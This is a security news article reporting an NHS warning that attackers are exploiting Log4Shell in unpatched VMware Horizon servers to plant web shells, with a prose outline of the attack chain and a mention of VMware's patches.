NHS Warns of Hackers Targeting Log4j Flaws in VMware Horizon

Technology

The digital security team at the U.K. National Health Service (NHS) has raised the alarm on active exploitation of Log4Shell vulnerabilities in unpatched VMware Horizon servers by an unknown threat actor to drop malicious web shells and establish persistence on affected networks for follow-on attacks.

“The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure,” the non-departmental public body said in an alert. “Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”

Automatic GitHub Backups

The web shell, once deployed, can serve as a conduit to carry out a multitude of post-exploitation activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerabilities.

VMware Horizon

Log4Shell is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical arbitrary remote code execution flaw in Apache Log4j 2, an ubiquitous open-source logging framework, which has been put to use as part of different malware campaigns since it came to light in December 2021. An array of hacking groups, ranging from nation-state actors to ransomware cartels, have pounced on the vulnerability to date.

Prevent Data Breaches

The development also marks the second time VMware products have come under exploitation stemming as a result of vulnerabilities in the Log4j library. Last month, AdvIntel researchers disclosed that attackers were targeting systems running VMware VCenter servers with the aim of installing Conti ransomware.

VMware, for its part, has already released security updates for Horizon, VCenter, and other products last month that have been impacted by Log4Shell, with the virtualization services provider acknowledging scanning attempts in the wild, urging customers to install the patches where applicable or apply workarounds temporarily to counter any potential risk.

Products You May Like

Articles You May Like

Blue Bloods Season 14 Episode 15 Review: Ridiculous Rules, Jamie and Eddie On Opposite Sides, And Other Things That Make The Cancellation Heartbreaking
Hear Shaboozey’s New Song ‘Good News’
Sony WF-C510 Review: Best TWS Under Rs 5,000?
New YA Books Out This Week, November 13, 2024
Gina Zollman To Perform Her Show “ORI gina LS” At The Arthur Newman Theatre, Palm Desert, CA, Sunday 11/24/24